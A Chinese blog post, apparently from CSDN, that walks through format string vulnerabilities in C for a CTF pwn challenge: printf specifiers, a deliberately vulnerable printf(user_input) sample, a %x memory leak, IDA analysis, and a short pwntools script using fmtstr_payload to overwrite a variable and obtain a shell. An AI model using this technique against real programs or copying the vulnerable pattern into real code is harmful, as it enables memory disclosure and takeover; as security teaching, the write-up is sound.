c代码格式化_CTF| 格式化字符串漏洞

最新推荐文章于 2023-10-11 15:32:55 发布
最新推荐文章于 2023-10-11 15:32:55 发布
阅读量341 收藏 1
点赞数
文章标签: c代码格式化 printf 格式化 输出 printf输出字符串 printf输出格式 shell 字符串比较 格式化字符串漏洞

格式化字符串漏洞是PWN题常见的考察点,仅次于栈溢出漏洞。漏洞原因:程序使用了格式化字符串作为参数,并且格式化字符串为用户可控。其中触发格式化字符串漏洞函数主要是printf、sprintf、fprintf、prin等C库中print家族的函数。

421d8a563d75ea404a67aa07b7731e10.gif 0x01 格式化字符串介绍

printf("格式化字符串",参数...)

该printf函数的第一个参数是由格式化说明符与字符串组成,用来规定参数用什么格式输出内容。

格式化说明符:

%d - 十进制 - 输出十进制整数
%s - 字符串 - 从内存中读取字符串
%x - 十六进制 - 输出十六进制数
%c - 字符 - 输出字符
%p - 指针 - 指针地址
%n - 到目前为止所写的字符数

例如:

#include 
int main(void){
 printf("My name is %s","Ezreal");
return 0;
}

调用以后会显示:

My name is Ezreal

特别要注意的是%n这个格式化字符串,它的功能是将%n之前打印出来的字符个数,赋值给一个变量。
例如:

#include 

int main(void)
{
 int c = 0;
 printf("the use of %n", &c);sss
 printf("%d\n", c);
return 0;
}

调用以后会显示:

the use of 11
421d8a563d75ea404a67aa07b7731e10.gif 0x02 漏洞形成原因

1、函数用法:

正常的printf用法:

#include 
int main()
{
 char str[100];
 scanf("%s",str);
 printf("%s",str);
return 0;
}

写程序时要规定字符串的格式化说明符,规定参数的输出类型。

错误的printf写法:

#include 
int main()
{
 char str[100];
 scanf("%s",str);
 printf(str);
return 0;
}

漏洞形成原因:程序将格式化字符串的输入权交给用户,printf函数并不知道参数个数,它的内部有个指针,用来索检格式化字符串。对于特定类型%,就去取相应参数的值,直到索检到格式化字符串结束。
所以没有参数,代码也会将format string 后面的内存当做参数以16进制输出。这样就会造成内存泄露。
示例程序:

#include 

int main(void)
{
 char a[100];
 scanf("%s",a);
 printf(a);
return 0;
}

假设我们的输入为:

AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x

程序的输出为:

AAAA61fe4c,61ffcc,76e4d250,70734fbf,fffffffe,76e473da,41414141,252c7825,78252c78,2c78252c,252c7825

成功打印出地址。

421d8a563d75ea404a67aa07b7731e10.gif 0x03 解题步骤

ad422dd23101b7e9cf3b9b474816085f.png

1.逆向工程:

将PWN题拖入IDA,点击程序入口函数。按F5逆向main函数,查看对应的C伪代码。

5cd5710f905423d9c41b1df2c98b0a89.png

找到关键代码:

8da07cb98ed6039b63733b12a8889785.png

2.分析代码:

方法一:直接分析源码
主函数main使用了printf函数并使用了格式化字符串。

int __cdecl main(int argc, const char **argv, const char **envp)
{
 char s; // [esp+1Ch] [ebp-8Ch]
 unsigned int v5; // [esp+9Ch] [ebp-Ch]

 v5 = __readgsdword(0x14u);
 memset(&s, 0, 0x80u);
 fgets(&s, 128, stdin);
 printf(&s);
if ( secret == 192 )
 give_shell();
else
 printf("Sorry, secret = %d\n", secret);
return 0;
}

方法二:使用漏洞检测插件
推荐一个简单IDA插件LazyIDA,将它放在IDA路径下的plugins目录。这时可以用IDA打开题目,右击就可以看到一个Scan format string vulnerabilities查询格式化字符串漏洞。

a96d1638d48dd9132fe3154a91096fcc.png

查询到漏洞:

b9275a0dfb36bcd3cd64c6da0e9ad48d.png

总结:
找到格式化字符串漏洞后,又发现了该题目的关键代码:

if ( secret == 192 )
 give_shell();
else

思路:当secret值为 192执行give_shell()函数,即利格式化字符串漏洞将secret值改为 192就能拿到shell

421d8a563d75ea404a67aa07b7731e10.gif 0x04 漏洞利用

用IDA查看secret地址为0x0804A048:

3d541c49ed884b880cbd501588879569.png

查找格式化字符串距离:

541069746315f36b582cba650783a39a.png

编写利用脚本如下:

from pwn import *
io = process('./format')
payload = fmtstr_payload(11,{0x0804A048:0xC0})
io.sendline(payload)
io.interactive()

成功拿到shell:

f899b6fb74584e625c50656018b19d5e.png 14f0bad7f13071f53ad5b9c172f2ba9f.gif

比较会装傻卖萌

比较想你关注我(* ̄∇ ̄*)

1d530e258086313961a0aa804b65eabe.png
weixin_39737947
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF|逆向工程软件之IDA
skyattractive的博客
05-30 4678
CTF入门学习|逆向软件安装之IDA 本文主要记录刚开始接触CTF(Capture The Flag)时所使用的一个软件。 Ida Pro IDA_Pro_v7.0_Portable 交互式反汇编器专业版(Interactive Disassembler Professional),人们常称其为IDA Pro,或简称为IDA。是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器! “是目前最棒的一个静态反编译软件” 其主要功能就是将我们拿到的二进制文件进
暑期CTF练习——第三周
AlienEowynWan的博客
07-22 326
攻防世界reverse进阶区IgniteMe 下载查壳 ida打开 12行可知flag的长度在4—30之间 后面的部分可以看出flag是EIS{……}的形式,现在要找出大括号中的部分 26和27两行经过判断之后出现了Congratulations,推测flag和sub_4011C0有关 可以看出将输入的flag从第五位开始,v8中的每一位小写转大写,大写转小写注意到33行有个异或,先看一下sub_4013C0 即变换过后的v8中的每一位和0x55异或后再加上72后再和byte_4420B0进行异或最
CTF-IDA的常用操作(初学者)
半岛铁盒的博客
11-30 2637
楼主临时起意往后会有补充~~ 1.shift+F12 查看string信息 (通常可以看到重要的信息 ) 2.Alt + T 查找带有目标字符串的函数 3. F5 查看 C代码 4. Ctrl + F 在函数框中 搜索函数 5. 空格键 流程图与代码 来回切换. ...
CTF逆向工程:Windows下的ida动态调试
qq_53008544的博客
10-22 2520
本次Windows下的ida动态调试主要以PYAble公众号上T6为例。 首先打开题目文件 要输入flag来判断正误。 我们再将题目文件放入exeinfope 发现是32位无壳。直接放入神器ida,搜索main函数。 点进main函数,Tab键转化为伪代码,将未知函数改名。 分析伪代码可知,若想得到flag,实际上就是将str1经过for循环加密后和自己输入的str2字符串作比较,若str1=str2,则输出...
CTF逆向-IDA Pro攻防世界Hello CTF
道阻且长,行则将至。
04-07 5712
文章目录前言Hello CTFIDA反汇编Flag值计算总结 前言 交互式反汇编器专业版(Interactive Disassembler Professional),人们常称其为 IDA Pro,或简称为 IDA。是目前最棒的一个静态反编译软件,为众多 0day 世界的成员和 ShellCode 安全分析人士不可缺少的利器!IDA Pro 是一款交互式的,可编程的,可扩展的,多处理器的,交叉 Windows 或 Linux WinCE MacOS 平台主机来分析程序, 被公认为最好的花钱可以买到的逆向工程
CTF-Reverse】IDA动态调试,反调试技术
WdIg-2023的博客
06-27 2769
在本专栏前两篇文章中,带领大家讲解了逆向加密算法,AES,TEA,RC4,Base64加密算法,并带领大家识别各种密码算法特征,这一篇文章来带领大家学习在逆向过程中的动态调试:IDA动态调试,反调试技术。
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
如果攻击者能够修改这个序列化字符串的长度,例如通过注入额外的数据,可能会影响反序列化过程。在某些情况下,这可能导致原本不应该执行的代码片段被执行,或者导致对其他数据的访问。 为了利用这种漏洞,攻击者...
信息安全_CTF中PWN题目实例分析.pptx
08-14
格式化字符串漏洞是一种常见的漏洞类型,发生在 printf 函数中,攻击者可以通过控制格式化字符串,读取或写入内存中的数据。 在本例中,我们可以看到格式化字符串漏洞的形成过程: 1. 首先,printf 函数中使用了...
CTF中的其他漏洞1
08-03
本篇内容主要讨论了CTF中除常见漏洞之外的一些特殊类型,包括格式化字符串漏洞、竞争条件漏洞代码逻辑漏洞以及类型混淆漏洞,并提供了相应的例子和解决方法。 1. **格式化字符串漏洞**: 格式化字符串漏洞通常...
CTF常见题型及解题思路.docx
最新发布
10-22
**PWN(exploitation)**涉及缓冲区溢出,如整数溢出、数组边界溢出、格式字符串漏洞、条件竞争和逻辑漏洞,通过这些漏洞实现代码执行和权限提升。 **Miscellaneous**类别广泛,可能包括隐写术(隐藏在图像中的信息...
pwnbox:夺旗(CTF)工具包
07-02
密码箱 夺旗(CTF)工具包安装将此行添加到应用程序的 ... find_address_by_name ( 'read' )格式化字符串错误一个例子如下。 # include < stdio># include < stdlib># include < string>int main ( int argc, char
CTF比赛必备常用工具
分享Python知识
09-19 1154
CTF比赛必备常用工具
CTF下的命令执行
Lemon's blog
04-28 9498
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3238
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
全站最完整的新版IDA 7不能显示搜索中文字符串的解决方法
donglxd的博客
10-11 2981
接上次x64dbg的话题,现在想用ida(本人安装的是IDA7.6)静态调试程序,但是发现utf-8的字符串都无法显示。如图:可以看到IDA7.6上和X64dbg不同,String字符串窗口(快捷键Shift+F12打开)中连中文乱码都没有,都是纯ANSI码(纯英文),看来是IDA解析出毛病了,一番搜索后发现吾爱论坛有个帖子,链接如下:(https://www.52pojie.cn/thread-648679-1-1.html)给出解决方法,确实如猜测,是IDA默认按照英文文件环境在解析程序,如帖子中所说的
格式化字符串漏洞
weixin_62675330的博客
02-13 5569
格式化字符串漏洞 初学pwn,学到了格式化字符串漏洞,总结一下。 格式化字符串函数:格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。 漏洞printf(s) 用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f” 然后 printf 函数会根据这个格式化字符串来解析对应的其他参数 %d - 十进制 - 输出十进制整数 %s - 字符串 - 从内存中读取字符串 %x - 十六进制 - 输出十六进制数 %c -
ida 字符串查找_IDA的常见操作
热门推荐
weixin_29663547的博客
01-13 1万+
IDA-python的使用:常用的apiget_bytes(address,count)从address处读取count个字节的内容patch_bytes(address,buf),将adress地址处patch成buf的内容Xrefsto(address,flags=0) 找到所有引用了adress的地址byte(address) 获取address地址的一个字节的内容一些IDA常用的快捷键:跳...
IDA Pro 搜索中文字符串
顺其自然~专栏
01-19 1万+
在Open subviews的子菜单中选择【Strings】 菜单,弹出String window 选择任意列表项,右击,点击Setup,弹窗如图: 对话框勾上 Unicode C-style (16 bits),点击 OK,如下图所示。另外需要注意的是图中最后面的 Minimal string lenght 这个是设置最小的字符串长度的,比如设置为 5,那么长度小于 5 的字符串就显示不出来,这个可以根据不同的情况配置。如果配置的太小了,就会出现很多无意义的数据,可能并不是字符串。 设置..
2023-GUDOCTF-L!S!(bindiff的使用)
qq_54894802的博客
04-18 487
本题主要是运用了bindiff这个插件。对于处理两个源码的函数处理,和符号恢复有奇效
ctf怎么构造payload
05-24
5. 格式化字符串漏洞:通过在格式化字符串函数中注入恶意的格式化字符串,从而实现任意内存读写或者代码执行。 以上只是一些常见的技术,具体还需要根据不同的场景和漏洞类型进行相应的学习和实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值